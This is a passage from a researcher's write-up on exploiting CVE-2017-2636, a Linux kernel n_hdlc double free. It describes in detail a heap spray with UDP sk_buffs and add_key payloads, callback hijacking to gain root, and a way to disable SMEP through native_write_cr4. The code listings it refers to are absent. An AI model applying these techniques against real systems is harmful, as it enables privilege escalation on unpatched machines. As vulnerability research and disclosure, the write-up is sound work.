As I mentioned, the doubly freed n_hdlc_buf item is allocated in the kmalloc-8192 slab cache. To exploit a double free in this cache, we need kernel objects slightly smaller than 8 KB. Actually, we need two types of such objects:

  • one containing some function pointer,
  • another one with the controllable payload, which can overwrite that pointer.

Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen sk_buff with its destructor_arg in struct skb_shared_info. This approach is not new – consider reading the cool write-up about CVE-2016-2384.

The network-related buffers in the Linux kernel are represented by struct sk_buff. See these great pictures describing the sk_buff data layout. What matters most for us is that the network data and skb_shared_info are placed in the same kernel memory block, pointed to by sk_buff.head. So creating a 7500-byte network packet in userspace will make skb_shared_info be allocated in the kmalloc-8192 slab cache. Exactly what we want.

But there is one challenge: n_hdlc_release() frees 13 n_hdlc_buf items straight away. At first I was trying to do the heap spray in parallel with n_hdlc_release(), but didn't manage to inject the corresponding kmalloc() between the needed kfree() calls. So I used another way: spraying after n_hdlc_release() can give two sk_buff items with the head pointing to the same memory. That's promising.

So we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP):

  • one client socket for sending UDP packets,
  • one dedicated server socket, which is likely to receive two packets with the same sk_buff.head,
  • 200 server sockets for receiving other packets emitted during heap spray,
  • 200 server sockets for receiving the packets emitted during slab exhaustion.

Ok. Now we need another kernel object for overwriting the function pointer in skb_shared_info.destructor_arg. We can't use sk_buff.head for that again, because skb_shared_info is placed at the same offset in sk_buff.head and we don't control it. I was really happy to find that add_key syscall is able to allocate the controllable data in the kmalloc-8192 too.

But I became upset when I encountered the key data quotas in /proc/sys/kernel/keys/ owned by root. The default value of /proc/sys/kernel/keys/maxbytes is 20000. That means only 2 add_key syscalls can concurrently store our 8 kB payload in kernel memory, and that's not enough.

But the happiness returned when I came across a bright idea in the slides of Di Shen from Keen Security Lab: the heap spray can succeed even if add_key fails!

So, let's look at the init_payload() code:


The definition of struct skb_shared_info and struct ubuf_info is copied to the exploit code from include/linux/skbuff.h kernel header.

The payload buffer will be passed to add_key as a parameter, and the data which we put there at 7872 - 18 = 7854 byte offset will exactly overwrite skb_shared_info.


The ubuf_info.callback is called in skb_release_data() if skb_shared_info.tx_flags has SKBTX_DEV_ZEROCOPY flag set to 1. In our case, ubuf_info item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.

Anyway, now the callback points to root_it(), which does the classical commit_creds(prepare_kernel_cred(0)). However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.

Heap spraying and stabilization


As I mentioned, n_hdlc_release() frees thirteen n_hdlc_buf items. Our exploit_skb() is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that packets 12, 13, 14, and 15 are the most likely to be exploitable, so they are sent to the dedicated server socket.

Now we are going to perform the use-after-free on sk_buff.data:

  • receive 4 network packets on the dedicated server socket one by one,
  • execute several add_key syscalls with our payload after receiving each of them.

The exact number of add_key syscalls giving the best results was found empirically by testing the exploit many times. The example of add_key call:


If we won the race and the heap spray landed well, our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in kernel memory:


Now we need to prepare the heap for the next round of n_hdlc racing. /proc/slabinfo shows that a kmalloc-8192 slab stores only 4 objects, so a double-free error has a high chance of crashing the allocator. But the following trick helps avoid that and makes the exploit much more stable: send a dozen UDP packets to fill the partially emptied slabs.

SMEP bypass

As I mentioned, the root_it() shellcode resides in the userspace. Executing it in the kernelspace is detected by SMEP (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register.

There are several approaches to defeating it; for example, Vitaly Nikolenko describes how to switch off SMEP using a stack-pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite amusing way to defeat SMEP without ROP. Please let me know if this approach is already known.

In arch/x86/include/asm/special_insns.h I've found this function:


It writes its first argument to CR4.

Now let's look at skb_release_data(), which executes the hijacked callback in the Ring 0:


We see that the destructor callback takes uarg address as the first argument. And we control this address in the exploited sk_buff.

So I've decided to write the address of native_write_cr4() to ubuf_info.callback and put the ubuf_info item at the mmap'ed userspace address 0x406e0, which is the correct value of CR4 with SMEP disabled.

In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable.

So let's initialize the payload a bit differently:


That SMEP bypass looks witty, but introduces one additional requirement: bit 18 (OSXSAVE) of CR4 must be set to 1. Otherwise target_addr becomes 0 and mmap() fails, since mapping the zero page is not allowed.

Conclusion

Investigating CVE-2017-2636 and writing this article was great fun for me. I want to thank Positive Technologies for the opportunity to work on this research. I would really appreciate feedback; see my contacts below.

Author: Alexander Popov

